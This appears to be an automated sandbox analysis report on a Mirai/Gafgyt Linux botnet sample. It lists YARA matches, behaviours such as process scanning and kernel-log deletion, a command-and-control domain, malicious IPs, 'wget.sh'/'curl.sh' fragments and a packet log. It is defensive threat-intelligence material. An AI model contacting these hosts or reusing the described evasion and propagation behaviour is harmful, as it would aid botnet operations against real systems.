      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: classification engineClassification label: mal92.troj.evad.linELF@0/1@19/0

      Data Obfuscation

      barindex
      Source: /tmp/i686.elf (PID: 6236)File: /etc/configJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /root/.cacheJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /root/.sshJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /root/.configJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /root/.localJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /tmp/.X11-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /tmp/.Test-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /tmp/.font-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /tmp/.ICE-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /tmp/.XIM-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6236)Directory: /etc/.javaJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/6592/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/6592/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8179/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8179/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9147/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9147/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9268/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9268/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8693/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8693/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9386/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9386/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8810/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8810/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9743/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9743/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9460/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9460/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8723/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8723/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/10895/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/10895/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/11027/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/11027/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/6760/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/6760/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7653/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7653/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7652/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7652/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9239/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9239/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7655/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7655/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7456/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7456/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7654/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7654/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/11350/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/11350/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/11394/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/11394/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9193/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9193/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/10780/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/10780/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7660/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7660/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7662/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7662/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7662/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7662/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7188/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7188/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7661/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7661/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7103/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7103/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7664/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7664/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9964/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9964/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7663/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7663/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7146/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7146/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7666/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7666/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9445/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9445/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7665/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7665/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7665/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7665/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7346/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7346/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8032/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8032/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9682/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9682/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7657/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7657/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9638/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9638/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7656/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7656/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/10197/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/10197/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7659/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7659/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/6603/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/6603/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7658/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7658/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/11321/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/11321/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8708/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/8708/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/10795/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/10795/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9773/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9773/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7670/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/7670/cmdlineJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9697/mapsJump to behavior
      Source: /tmp/i686.elf (PID: 6256)File opened: /proc/9697/cmdlineJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/i686.elf (PID: 6236)Log files deleted: /var/log/kern.logJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam
      Source: TrafficDNS traffic detected: queries for: www.onlydance.cam

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: i686.elf, type: SAMPLE
      Source: Yara matchFile source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: i686.elf, type: SAMPLE
      Source: Yara matchFile source: 6278.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6234.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path Interception1
      Hidden Files and Directories
      1
      OS Credential Dumping
      System Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Indicator Removal
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
      Application Layer Protocol
      Traffic DuplicationData Destruction
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      SourceDetectionScannerLabelLink
      i686.elf34%ReversingLabsLinux.Trojan.Mirai
      i686.elf100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      www.onlydance.cam
      unknown
      unknowntrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http:///wget.shi686.elffalse
          high
          http:///curl.shi686.elffalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            193.60.179.202
            unknownUnited Kingdom
            786JANETJiscServicesLimitedGBfalse
            38.60.221.89
            unknownUnited States
            174COGENT-174UStrue
            122.56.204.220
            unknownNew Zealand
            4771SPARKNZSparkNewZealandTradingLtdNZfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            156.244.6.20
            unknownSeychelles
            132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
            188.166.182.194
            unknownNetherlands
            14061DIGITALOCEAN-ASNUStrue
            222.149.240.69
            unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
            74.125.250.129
            unknownUnited States
            15169GOOGLEUSfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            156.244.6.20i686.elfGet hashmaliciousMiraiBrowse
              38.60.221.89i686.elfGet hashmaliciousMiraiBrowse
                188.166.182.194i686.elfGet hashmaliciousMiraiBrowse
                  i686.elfGet hashmaliciousMiraiBrowse
                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                    91.189.91.43nshkarm5.elfGet hashmaliciousUnknownBrowse
                      nsharm.elfGet hashmaliciousUnknownBrowse
                        arm.elfGet hashmaliciousMiraiBrowse
                          sh4.elfGet hashmaliciousMiraiBrowse
                            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                              la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                nsharm7.elfGet hashmaliciousUnknownBrowse
                                  hmips.elfGet hashmaliciousUnknownBrowse
                                    nshkarm.elfGet hashmaliciousUnknownBrowse
                                      Space.mpsl.elfGet hashmaliciousUnknownBrowse
                                        91.189.91.42nshkarm5.elfGet hashmaliciousUnknownBrowse
                                          nsharm.elfGet hashmaliciousUnknownBrowse
                                            arm.elfGet hashmaliciousMiraiBrowse
                                              sh4.elfGet hashmaliciousMiraiBrowse
                                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                  la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                    nsharm7.elfGet hashmaliciousUnknownBrowse
                                                      hmips.elfGet hashmaliciousUnknownBrowse
                                                        nshkarm.elfGet hashmaliciousUnknownBrowse
                                                          Space.mpsl.elfGet hashmaliciousUnknownBrowse
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            COGENT-174USFantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                            • 38.196.127.211
                                                            Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                            • 38.227.136.220
                                                            Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 38.48.114.39
                                                            momo.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 206.1.21.164
                                                            momo.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 206.1.21.186
                                                            momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 149.52.60.238
                                                            z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 149.30.141.192
                                                            4.elfGet hashmaliciousUnknownBrowse
                                                            • 38.176.131.73
                                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                                            • 149.35.158.117
                                                            armv4l.elfGet hashmaliciousUnknownBrowse
                                                            • 154.64.199.93
                                                            SPARKNZSparkNewZealandTradingLtdNZFantazy.i686.elfGet hashmaliciousUnknownBrowse
                                                            • 122.57.172.13
                                                            armv7l.elfGet hashmaliciousUnknownBrowse
                                                            • 219.88.189.201
                                                            fuckunix.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 122.60.68.206
                                                            Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 122.58.125.161
                                                            armv5l.elfGet hashmaliciousMiraiBrowse
                                                            • 222.152.112.138
                                                            nklarm5.elfGet hashmaliciousUnknownBrowse
                                                            • 122.57.111.15
                                                            jklmips.elfGet hashmaliciousUnknownBrowse
                                                            • 122.58.5.166
                                                            3.elfGet hashmaliciousUnknownBrowse
                                                            • 122.59.185.91
                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 115.188.197.93
                                                            nsharm7.elfGet hashmaliciousMiraiBrowse
                                                            • 222.153.252.208
                                                            JANETJiscServicesLimitedGBz0r0.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 192.41.123.141
                                                            z0r0.spc.elfGet hashmaliciousMiraiBrowse
                                                            • 195.194.172.116
                                                            armv4l.elfGet hashmaliciousUnknownBrowse
                                                            • 161.126.22.233
                                                            2.elfGet hashmaliciousUnknownBrowse
                                                            • 157.140.67.198
                                                            armv4l.elfGet hashmaliciousUnknownBrowse
                                                            • 195.194.111.174
                                                            armv7l.elfGet hashmaliciousUnknownBrowse
                                                            • 138.38.123.46
                                                            1.elfGet hashmaliciousUnknownBrowse
                                                            • 157.228.187.253
                                                            fuckunix.spc.elfGet hashmaliciousMiraiBrowse
                                                            • 161.74.109.144
                                                            fuckunix.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 144.32.133.21
                                                            fuckunix.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 146.179.252.5
                                                            No context
                                                            No context
                                                            Process:/tmp/i686.elf
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):146
                                                            Entropy (8bit):4.024394204278479
                                                            Encrypted:false
                                                            SSDEEP:3:TBGTD+FN5CSNE4F58SASI7AWHF5x5mAR/VB6GEDwcL7uoL/:TBGD+5F+RLl0AR/VgGEDLHB/
                                                            MD5:E77B19565FA2C8C6B780A198F3889313
                                                            SHA1:4B18D7D88944804C96620323D60EE89E4B985BB4
                                                            SHA-256:F71785724FCE340C9FF9CD4341B920A602A47C0B496C57CCA177B94CB4BA297D
                                                            SHA-512:D22AAC8ADD55BCD9672465F3E67AF9DD4B69C0C85903C16A1C19ABDEA59EA0674DF69FF7D7F646FE642417103C7D4B6B5B3B1D5A8017C321417CBC5B3C243732
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:The gods watch from the heavens? Let them see what a mortal can become. let them witness a man who defies their will and carves his own destiny...
                                                            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                            Entropy (8bit):6.279618477243282
                                                            TrID:
                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                            File name:i686.elf
                                                            File size:91'760 bytes
                                                            MD5:167e952f5a106e6959c974b25b7056fc
                                                            SHA1:313856b0b2850aa735c42b38e08f5637fb80d0be
                                                            SHA256:967cdf3d5a9a1683076ad9018c0ae6c290cb125ee164bf150eb681f03877ea07
                                                            SHA512:477f555d07f731bc616db60559f95bd0ebcfdcec49ca0ecb7727bdb407bd08ed8e688bcb9e8da6cbaa61358f25aaee5c4dd3a5a7971682661c9ee98918633157
                                                            SSDEEP:1536:XZGrfv01Ym9V30kZuALiiwqswB/HTFQABzx5w5OevjWF+u//yizkBYN:XZGrk1Ym9V33fii3fTSABg5OUWFb/yiD
                                                            TLSH:F6932A4375D08DFEC49AC53A4A5F913AEA72F16D2221734B2784BB312E8EE213F1D519
                                                            File Content Preview:.ELF..............>.......@.....@........c..........@.8...@.......................@.......@......].......].......................].......]Q......]Q..............q..............Q.td....................................................H...._....Z...H........

                                                            ELF header

                                                            Class:ELF64
                                                            Data:2's complement, little endian
                                                            Version:1 (current)
                                                            Machine:Advanced Micro Devices X86-64
                                                            Version Number:0x1
                                                            Type:EXEC (Executable file)
                                                            OS/ABI:UNIX - System V
                                                            ABI Version:0
                                                            Entry Point Address:0x400194
                                                            Flags:0x0
                                                            ELF Header Size:64
                                                            Program Header Offset:64
                                                            Program Header Size:56
                                                            Number of Program Headers:3
                                                            Section Header Offset:91120
                                                            Section Header Size:64
                                                            Number of Section Headers:10
                                                            Header String Table Index:9
                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                            NULL0x00x00x00x00x0000
                                                            .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                            .textPROGBITS0x4001000x1000x116860x00x6AX0016
                                                            .finiPROGBITS0x4117860x117860xe0x00x6AX001
                                                            .rodataPROGBITS0x4117a00x117a00x45700x00x2A0032
                                                            .ctorsPROGBITS0x515d180x15d180x100x00x3WA008
                                                            .dtorsPROGBITS0x515d280x15d280x100x00x3WA008
                                                            .dataPROGBITS0x515d400x15d400x6700x00x3WA0032
                                                            .bssNOBITS0x5163c00x163b00x6ae80x00x3WA0032
                                                            .shstrtabSTRTAB0x00x163b00x3e0x00x0001
                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                            LOAD0x00x4000000x4000000x15d100x15d106.34710x5R E0x100000.init .text .fini .rodata
                                                            LOAD0x15d180x515d180x515d180x6980x71902.54790x6RW 0x100000.ctors .dtors .data .bss
                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-05T21:35:22.598947+01002013514ET MALWARE Potential DNS Command and Control via TXT queries1192.168.2.2351465208.67.222.22253UDP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 5, 2025 21:32:53.039068937 CET5818623192.168.2.23193.60.179.202
                                                            Jan 5, 2025 21:32:53.043966055 CET2358186193.60.179.202192.168.2.23
                                                            Jan 5, 2025 21:32:53.044018030 CET5818623192.168.2.23193.60.179.202
                                                            Jan 5, 2025 21:32:53.047192097 CET4856423192.168.2.23122.56.204.220
                                                            Jan 5, 2025 21:32:53.052018881 CET2348564122.56.204.220192.168.2.23
                                                            Jan 5, 2025 21:32:53.052081108 CET4856423192.168.2.23122.56.204.220
                                                            Jan 5, 2025 21:32:53.078188896 CET3838023192.168.2.23222.149.240.69
                                                            Jan 5, 2025 21:32:53.083069086 CET2338380222.149.240.69192.168.2.23
                                                            Jan 5, 2025 21:32:53.083129883 CET3838023192.168.2.23222.149.240.69
                                                            Jan 5, 2025 21:32:53.089823008 CET4856423192.168.2.23122.56.204.220
                                                            Jan 5, 2025 21:32:53.089823008 CET5818623192.168.2.23193.60.179.202
                                                            Jan 5, 2025 21:32:53.089835882 CET3838023192.168.2.23222.149.240.69
                                                            Jan 5, 2025 21:32:53.094806910 CET2348564122.56.204.220192.168.2.23
                                                            Jan 5, 2025 21:32:53.094818115 CET2338380222.149.240.69192.168.2.23
                                                            Jan 5, 2025 21:32:53.094825983 CET2358186193.60.179.202192.168.2.23
                                                            Jan 5, 2025 21:32:53.094871044 CET3838023192.168.2.23222.149.240.69
                                                            Jan 5, 2025 21:32:53.094878912 CET4856423192.168.2.23122.56.204.220
                                                            Jan 5, 2025 21:32:53.094878912 CET5818623192.168.2.23193.60.179.202
                                                            Jan 5, 2025 21:32:53.116507053 CET3460631428192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:32:53.121870041 CET314283460638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:32:53.121925116 CET3460631428192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:32:54.128345966 CET314283460638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:32:54.132065058 CET3460631428192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:32:54.132065058 CET3460631428192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:32:54.139256954 CET314283460638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:32:54.139319897 CET3460631428192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:32:54.875418901 CET43928443192.168.2.2391.189.91.42
                                                            Jan 5, 2025 21:33:00.506628990 CET42836443192.168.2.2391.189.91.43
                                                            Jan 5, 2025 21:33:02.042416096 CET4251680192.168.2.23109.202.202.202
                                                            Jan 5, 2025 21:33:04.620714903 CET4959662849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:04.625483990 CET6284949596156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:04.625551939 CET4959662849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:05.617578030 CET6284949596156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:05.617634058 CET4959662849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:05.621845961 CET4959662849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:05.627058029 CET6284949596156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:05.627106905 CET4959662849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:16.100368023 CET4959862849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:16.105200052 CET6284949598156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:16.105257034 CET4959862849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:16.376403093 CET43928443192.168.2.2391.189.91.42
                                                            Jan 5, 2025 21:33:17.101277113 CET6284949598156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:17.101325989 CET4959862849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:17.104940891 CET4959862849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:17.110696077 CET6284949598156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:17.110749006 CET4959862849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:26.614979982 CET42836443192.168.2.2391.189.91.43
                                                            Jan 5, 2025 21:33:27.715955973 CET3706619823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:27.721617937 CET1982337066156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:27.721677065 CET3706619823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:28.697489023 CET1982337066156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:28.697532892 CET3706619823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:28.716697931 CET3706619823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:28.725832939 CET1982337066156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:33:28.725882053 CET3706619823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:33:32.762128115 CET4251680192.168.2.23109.202.202.202
                                                            Jan 5, 2025 21:33:39.200633049 CET4951064715192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:39.205425978 CET6471549510188.166.182.194192.168.2.23
